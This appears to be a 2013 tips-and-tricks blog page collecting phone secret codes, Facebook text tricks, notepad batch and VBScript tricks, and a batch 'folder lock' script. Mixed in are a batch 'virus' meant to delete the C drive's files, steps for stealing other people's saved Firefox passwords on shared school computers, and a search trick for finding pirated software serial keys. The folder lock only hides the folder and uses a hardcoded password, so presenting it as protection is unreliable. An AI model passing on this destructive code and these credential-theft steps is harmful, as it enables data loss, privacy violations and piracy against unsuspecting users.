BREAKING NEWS

Category 5

?max-results="+numposts2+"&orderby=published&alt=json-in-script&callback=recentarticles6\"><\/script>");

Category 6

Category 7

Saturday, April 27, 2013

All Mobiles Secret Codes

All Mobiles Secret Codes
Samsung Secret Codes

Software version: *#9999#
IMEI number: *#06# Serial number: *#0001# Battery status- Memory capacity : *#9998*246#
Debug screen: *#9998*324# - *#8999*324#

LCD kontrast: *#9998*523#


LG Secret Codes


LG all models test mode: Type 2945#*# on the main screen.

2945*#01*# Secret menu for LG
IMEI (ALL): *#06#
IMEI and SW (LG 510): *#07#
Software version (LG B1200): *8375#
Recount cheksum (LG B1200): *6861#
Factory test (B1200): #PWR 668
Simlock menu (LG B1200): 1945#*5101#
Simlock menu (LG 510W, 5200): 2945#*5101#
Simlock menu (LG 7020, 7010): 2945#*70001#


Motorola Secret Codes


IMEI number:

*#06#
Code to lock keys. Press together *7
Note: [] (pause) means the * key held in until box appears.
Select phone line - (use this to write things below the provider name):
[] [] [] 0 0 8 [] 1 []
Add phonebook to main menu:
[] [] [] 1 0 5 [] 1 []


Nokia Secret Codes


*#06# for checking the IMEI (
International Mobile Equipment Identity).
*#7780# reset to factory settings.
*#67705646# This will clear the LCD display(operator logo).
*#0000# To view software version.
*#2820# Bluetooth device address.
*#746025625# Sim clock allowed status.
*#62209526# - Display the MAC address of the WLAN adapter. This is available only in the newer devices that supports WLAN.

Paste blank Status on Facebook

Paste blank Status on Facebook

 
blank status on facebook. You can also use this method in facebook comments. So lets get started.
   For single line Blank Status
  • Copy below codes into your status
@[0:0: ]
  • Note:- the text is like @[0:0:space]
  • Dont write space where i have writen space rather press spacebar.

   For MultiLine Blank Status :
  • Paste as shown below in your staus.
@[0:0: ]
@[0:0: ]
@[0:0: ]
@[0:0: ]
@[0:0: ]
@[0:0: ]
  • Note there is space after 0:


New Facebook Smiley Codes for Chat

New Facebook Smiley Codes for Chat

Code For Facebook Smileys


[[f9.laugh]]
[[f9.sad]]
[[f9.angry]]
[[f9.sleepy]]
[[f9.shock]]
[[f9.kiss]]
[[f9.inlove]]
[[f9.pizza]]
[[f9.coffee]]
[[f9.rain]]
[[f9.bomb]]
[[f9.sun]]
[[f9.heart]]
[[f9.heartbreak ]]
[[f9.doctor]]
[[f9.ghost]]
[[f9.brb]]
[[f9.wine]]
[[f9.gift]]
[[f9.adore]]
[[f9.angel]]
[[f9.baloons]]
[[f9.bowl]]
[[f9.cake]]
[[f9.callme]]
[[f9.clap]]
[[f9.confused]]
[[f9.curllip]]
[[f9.devilface] ]
[[f9.lying]]

 

How To Hack Saved Password In Firefox ?

How To Hack Saved Password In Firefox ?

 

How to do ?

1. Open Firefox Web Broweser
2. Then Click on FireFox > Option > Option as shown in below picture


3. Then a POP Up box will appear, In that go to security and click on Show Passwords as show below.

 
 

4. Now click on website whose password you want to see ans click on show password as shown in below image. (Note: It will ask for confirmation so click on yes when dialog box appears)

 
 

5. Done, You have hacked password of your victim with few simple steps. You can try this at school computer lab if someone have saved their password. 
 


Top 5 Cool Notepad Tricks

Top 5 Cool Notepad Tricks
notepad tricks
I had previously share some Interesting computer tricks as well as cool Batch file programs. In this post i will share with you guys some of the cool notepad tricks.As name suggest you don't require any program other then notepad. So lets get started.


1. World Trade Center Attack Trick

world trade center trick

The flight number of the plane that had hit World Trade Center on  (9/11) was Q33NY. Now we call this trick or a coincidence or something else but whatever it is you will be definately amazed by the this trick.

    1. Open Notepad and Type “Q33N” (without quotes) in capital letters.
    2. Increase the font size to 72.
    3. Change the Font to Wingdings.






2. Matrix Effect Trick

matrix effect trick
In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.

    1. Open Noteapad and copy below code into it.


@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

    2. Now save this file as Matrix.bat (name can be anything but .bat is must)
    3. Open your saved file and you will have matrix effect on your screen.






3. Creating Virus That Format C Drive

In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

    1. Open Notepad and copy below code into it.


@Echo off
Del C:\ *.* |y
 
    2. Then Save this file as virus.bat
    3. Now, running this file format C Drive.




4. Making Personal Diary Using Notepad 

notepad tricks
Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.
    1. Open Notepad and Type .LOG (in capital Letters and press enter
    2. Save the program with any name and close it.
    3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad

5. Dancing Keyboard Led



keyboard dancing led

In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script.

    1. Open Notepad and copy below codes into it.


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
    2. Then save this file as dance.vbs (name can be anything but .vbs is must)
    3. Open your save file and see your keyboard led blinking like disco lights.

Posting Facebook Status Upside Down

Posting Facebook Status Upside Down 


How To Do ?

  1. First GoTo FlipText Website by Clicking Here.
  2. Enter you message or text in text area and click on Flip.
  3. Copy the upside down text and paste it in your facebook status or where ever you want to use it.
  4. Enjoy!

Finding Ip Address Of A Website Using Command Prompt Or CMD

Finding Ip Address Of A Website Using Command Prompt Or CMD




1. Go to Start > Type CMD and press Enter.
2. Now write Ping followed by website URL whose IP you want to find.

finding ip adddress of website
3. It will take less then a second and come up with the results as shown below.
finding ip adddress of website

In  my next post i will show you another easy way to find website IP Address and teach you to use this IP to find its location.

Find The Serial Key of Any Software with a Simple Tricks

Find The Serial Key of Any Software with a Simple Tricks



  The key 94FBR is a part of  Office 2000 Pro CD activation key that is widely distributed as it bypasses the activation requirements of Office 2000 Pro. By searching for 94fbr and the product name, you are guarantee that the pages that are returned are pages dealing specifically with the product you're wanting a serial for. Follow simple steps given below to learn this trick

    1. Go to Google
    2. Then type  Software Name 94FBR

    Replace Software Name with the name of software whose serial key you want to find
    Eg: To find serial key of Nero i will type Nero 94fbr

    3. Now press Enter and you will find serial key of software you are looking for as shown below.



Lock any Folder With Password without any software

Lock any Folder With Password without any software

1. Open Notepad and Copy code given below into it.


: cls

@ECHO OFF

title Folder Lock by BJ Kuikel

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK

if NOT EXIST Bijay goto MDLOCKER

:CONFIRM

echo                    This Program is designed by BJ Kuikel                                                                                                                                                                                                                                                                      On dedication for someone....                                                                                                                                                                                         Are you sure you want to lock the folder(Y/N)

set/p "cho=>"

if %cho%==Y goto LOCK

if %cho%==y goto LOCK

if %cho%==n goto END

if %cho%==N goto END

echo Invalid choice.

goto CONFIRM

:LOCK

ren Bijay "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

echo Folder locked

goto End

:UNLOCK

echo                   This Program is designed by BJ Kuikel                                                                                                                                                                                                                                                                    On dedication for someone....                                                                                                                                                                                           Enter password to unlock folder

set/p "pass=>"

if NOT %pass%== bijay goto FAIL

attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Bijay

echo Folder Unlocked successfully

goto End

:FAIL

echo Invalid password

goto end

:MDLOCKER

md Bijay

echo Bijay created successfully

goto End

:End


   2. Save the notepad file as lock.bat (.bat is must)


   3. Now double click on lock.bat and a new folder will be created with name MyFolder

   4. Copy all your data you want to protect in that New folder

   5. Now double click on lock.bat and when command promp appears Type Y and press enter.

   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat

   7. It will ask for password enter your password and done. (Default password is bijay)

 
Copyright © 2013 Computer Tips Tricks
template bysankhuwasavaonline.com